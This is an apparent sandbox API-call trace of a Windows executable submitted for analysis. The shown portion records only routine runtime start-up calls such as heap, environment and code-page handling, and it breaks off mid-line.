# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 09.04.2020 13:25:45.265 Process: id = "1" image_name = "cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe" page_root = "0x2ba7a000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xae8 [0049.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x792ba3a0, dwHighDateTime=0x1d60e72)) [0049.986] GetCurrentProcessId () returned 0xaec [0049.986] GetCurrentThreadId () returned 0xae8 [0049.986] GetTickCount () returned 0x11473aa [0049.986] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=17010823035) returned 1 [0050.097] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x4058be)) [0050.098] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0050.098] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1d60000 [0050.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0050.100] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0050.101] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0050.101] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0050.101] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0050.103] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x214) returned 0x1d607d0 [0050.103] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0050.103] GetCurrentThreadId () returned 0xae8 [0050.103] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4054e5, hStdOutput=0x40581e, hStdError=0x1d607d0)) [0050.104] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x8, Size=0x800) returned 0x1d609f0 [0050.105] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0050.105] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0050.105] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0050.105] SetHandleCount (uNumber=0x20) returned 0x20 [0050.105] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" " [0050.105] GetEnvironmentStringsW () returned 0x271ec0* [0050.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0050.106] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x0, Size=0x565) returned 0x1d611f8 [0050.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1d611f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0050.106] FreeEnvironmentStringsW (penv=0x271ec0) returned 1 [0050.106] GetLastError () returned 0x5 [0050.106] SetLastError (dwErrCode=0x5) [0050.106] GetLastError () returned 0x5 [0050.106] SetLastError (dwErrCode=0x5) [0050.106] GetLastError () returned 0x5 [0050.106] SetLastError (dwErrCode=0x5) [0050.106] GetACP () returned 0x4e4 [0050.106] RtlAllocateHeap (HeapHandle=0x1d60000, Flags=0x0, Size=0x220) returned 0x1d61768 [0050.106] GetLastError () returned 0x5 [0050.107] SetLastError (dwErrCode=0x5) [0050.107] IsValidCodePage (CodePage=0x4e4) returned 1 [0050.107] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0050.107] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0050.107] GetLastError () returned 0x5 [0050.107] SetLastError (dwErrCode=0x5) [0050.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0050.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0050.107] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0050.107] GetLastError () returned 0x5 [0050.107] SetLastError (dwErrCode=0x5) [0050.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0050.107] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瀞钎븕@Ā") returned 256 [0050.108] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瀞钎븕@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0050.108] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瀞钎븕@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0050.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿl¯\x1d\x8c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0050.108] GetLastError () returned 0x5 [0050.108] SetLastError (dwErrCode=0x5) [0050.108] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0050.108] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瀞钎븕@Ā") returned 256 [0050.108] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瀞钎븕@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0050.108] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瀞钎븕@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0050.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿl¯\x1d\x8c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0050.108] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6dc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0x6c [0050.108] GetLastError () returned 0x0 [0050.108] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.109] GetLastError () returned 0x0 [0050.109] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.110] GetLastError () returned 0x0 [0050.110] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.111] SetLastError (dwErrCode=0x0) [0050.111] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.112] GetLastError () returned 0x0 [0050.112] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.113] GetLastError () returned 0x0 [0050.113] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.114] SetLastError (dwErrCode=0x0) [0050.114] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.115] SetLastError (dwErrCode=0x0) [0050.115] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 0x0 [0050.116] SetLastError (dwErrCode=0x0) [0050.116] GetLastError () returned 